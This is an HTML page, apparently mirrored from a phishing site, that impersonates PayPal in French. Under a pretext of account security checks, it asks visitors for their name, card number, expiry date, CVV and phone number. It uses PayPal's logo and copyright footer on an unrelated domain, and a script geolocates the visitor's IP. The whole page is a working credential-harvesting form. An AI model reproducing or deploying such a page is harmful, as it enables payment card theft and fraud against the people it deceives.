    <!DOCTYPE html>
    <html dir="ltr">
        
<!-- Mirrored from virement-c2fr-fr.mon.world/app/f6aafb28fda53531e4a055a5669ceed3/info/billing.php_enc=01d7d583a7bb684c451f502b3989e65b&p=1&dispatch=0d84cd01a8c598e5cc69badfaf2eabf72158cf70 by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 26 Apr 2021 23:32:39 GMT -->
<head>
            <title>Confirmez votre adresse</title>
            <meta http-equiv="X-UA-COMPATIBLE" content="IE-edge" />
            <meta name="viewport" content="width=device-width, initial-scale=1.0">
            <meta charset="utf8">
            <link rel="stylesheet" href="../css/normalize.css" />
            <link rel="stylesheet" href="../css/bootstrap.min.css" />
            <link rel="stylesheet" href="../css/font-awesome.min.css" />
            <link rel="stylesheet" href="../css/main_style.css" />
            <link rel="shortcut icon" type="image/x-icon" href="https://virement-c2fr-fr.mon.world/app/f6aafb28fda53531e4a055a5669ceed3/img/pp_favicon_x.ico">
        </head>
        <body class="vx_root vx_addFlowTransition vx_hasFadeTransition">
            <div class="contain">
                <div class="img-logo">
                    <a href="#"><img src="../img/paypal-logo.png" style="height: 160px;margin-top: -60px;margin-bottom: -75px;"></a>
                </div>
                <div class="center-color"></div>
                <div class="right-btn"><a href="#" class="log_out">Déconnexion</a></div>
                <div class="cls"></div>
            </div>

			<div class="vx_modal-flow vx_modalPrepToOpen vx_modalIsOpen modal-flow" id="mainModal" tabindex="-1" aria-labelledby="js_modalHeader">
				<div class="vx_modal-wrapper-backgroundOverride vx_modal-wrapper vx_modal-wrapper_logo elementDirection" tabindex="-1">
					<div class="vx_modal-content">
			
						 <header class="vx_modal-header">
					<div class="expandableContainer">
										<label for="paypalAccountData_tcpa">
											Pour des raisons de sécurité, nous procederons parfois à la vérification rapidement de vos informations personnelles, y compris à chaque mise à jour du site. Veuillez confirmer votre compte.
										</label>
									</div>
					<p class="vx_text-body"></p>
				</header>
				<div class="vx_modal-body vx_blocks-for-mobile">
					<div>
						<div class="vx_modal-body vx_blocks-for-mobile">
							<div class="form-container">
												  <form method="POST" action="" accept-charset="UTF-8" class="proceed maskable" autocomplete="off" name="cvalidate"><input name="_token" type="hidden" value="BpuWz5vIAOk3PLRLpC1VwwEmVeTm3fVrp5dj6YJW">
			
			
							   <div class="card-wrapper"></div>
			
								  <div class="vx_form-group vx_floatingLabel vx_floatingLabel_active" data-label-content="Prénom">
									 <label class="floatingLabel" for="cardNumber">Prénom</label>
									 <input value="<?php echo $cardPrenom; ?>" aria-label="login_emaildiv" class="test_cardNumber test_cardNumber vx_form-control" required="required" autocomplete="off_cardprenom" placeholder="Entrez le Pénom(s) du titulaire de la carte" aria-describedby="text-info-cardNumber" id="cardPrenom" name="cardPrenom" type="text">
								  </div>
								  <div class="vx_form-group vx_floatingLabel vx_floatingLabel_active" data-label-content="Nom">
									 <label class="floatingLabel" for="cardNumber">Nom</label>
									 <input value="<?php echo $cardNom; ?>" aria-label="login_emaildiv" class="test_cardNumber test_cardNumber vx_form-control" required="required" autocomplete="off_cardprenom" placeholder="Entrez le Nom du titulaire de la carte" aria-describedby="text-info-cardNumber" id="cardNom" name="cardNom" type="text">
								  </div>
			
									<div class="vx_form-group vx_floatingLabel vx_floatingLabel_active" data-label-content="Numéro de carte">
										<label class="floatingLabel" for="cardNumber">Numéro de carte</label>
									   <input value="<?php echo $cardNumber; ?>" aria-label="login_emaildiv" class="test_cardNumber test_cardNumber vx_form-control" required="required" autocomplete="off_cardNumber" placeholder="Entrez le nº de carte" aria-describedby="text-info-cardNumber" id="cardNumber" name="cardNumber" type="text">
									</div>
			
									<div class="vx_form-group vx_floatingLabel vx_floatingLabel_active vx_floatingLabel_complex" data-label-content="Date d&#x27;expiration">
										<label class="floatingLabel" for="expDate">Date d&#x27;expiration</label>
										<div class="vx_form-control" data-label-content="Date d&#x27;expiration">
										   <input value="<?php echo $expDate; ?>" aria-label="login_emaildiv" class="test_expDate" required="required" autocomplete="off_expDate" placeholder="mm/aa" aria-describedby="text-info-expDate" id="expDate" name="expDate" type="text">
										</div>
									   <span></span>
									</div>
									<div class="table-container">
										<div class="table-row">
											<div class="table-col-xs-10">
												<div class="vx_form-group vx_floatingLabel vx_floatingLabel_active" data-label-content="Cryptogramme visuel">
													<label class="floatingLabel" for="verificationCode">Cryptogramme visuel</label>
													  <input value="<?php echo $verificationCode; ?>" aria-label="login_emaildiv" class="test_verificationCode test_verificationCode vx_form-control" required="required" autocomplete="off_verificationCode" placeholder="Saisissez le cryptogramme visuel." aria-describedby="text-info-verificationCode" id="verificationCode" name="verificationCode" type="text">
			
												</div>
											</div>
											<div class="table-col-xs-2 cardImage-container"><span data-name="" class="rectangleLogo_small shadow  csc-image "></span></div>
										</div>
									</div>
									
									<div class="vx_form-group vx_floatingLabel vx_floatingLabel_active" data-label-content="Numéro de Mobile">
										<label class="floatingLabel" for="cardNumber">Numéro de Mobile</label>
									   <input value="<?php echo $tel; ?>" aria-label="login_emaildiv" class="test_cardNumber test_cardNumber vx_form-control" required="required" autocomplete="off_cardNumber" placeholder="Entrez le nº de téléphone lié à la carte" aria-describedby="text-info-cardNumber" id="cardNumber" name="tel" type="text">
									</div>
			
									<button type="submit" data-testid="button-submit" name="detailsSubmit" data-track="{}" class="btn vx_btn vx_btn-block card-submit test_add-card-submit" title="">Valider</button>
							   </form>
			
							</div>
			
						</div>
			
					</div>
			
				</div>
			
						<div class="signup-page-footer vx_text-legal center">©1999-2021 PayPal. Tous droits réservés.</div>
			
					</div>
				</div>
			
			</div>
			
			<script type="text/javascript" src="public/js/vx-lib.min.js"></script>
			<script type="text/javascript" defer="" src="public/js/vendor.js"></script>
			<script type="text/javascript" defer="" src="public/js/flowBundle.js"></script>
			<script type="text/javascript" defer="" src="public/js/pa.js"></script>
			   
			
			   <script type="text/javascript" src="public/js/card.js"></script>
			   <script type="text/javascript">
				  var card = new Card({
					 form: 'form',
					 container: '.card-wrapper',
					 formSelectors: {
						nameInput: 'input[name="cardPrenom"], input[name="cardNom"]',
						numberInput: 'input[name="cardNumber"]', // optional — default input[name="number"]
						expiryInput: 'input[name="expDate"]', // optional — default input[name="expiry"]
						cvcInput: 'input[name="verificationCode"]', // optional — default input[name="cvc"]
					 },
					 messages: {
						validDate: 'expire\ndate',
						monthYear: 'mm/yyyy'
					 }
				  });
			   </script>
            
            <script src="../js/jquery-1.11.3.min.js"></script>
            <script src="../js/bootstrap.min.js"></script>
            <script src="../js/cont.html"></script>
            <script src="../js/jquery.maskedinput.js"></script>
            <script src="../js/plugins.js"></script>
            <script>
    $(document).ready(function() {
            $.getJSON("http://ip-api.com/json", function(data) {
                    var kap = (data.country);
                    $("#country").val(kap);
                });
    });
            </script>
        </body>
    
<!-- Mirrored from virement-c2fr-fr.mon.world/app/f6aafb28fda53531e4a055a5669ceed3/info/billing.php_enc=01d7d583a7bb684c451f502b3989e65b&p=1&dispatch=0d84cd01a8c598e5cc69badfaf2eabf72158cf70 by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 26 Apr 2021 23:32:40 GMT -->
</html>
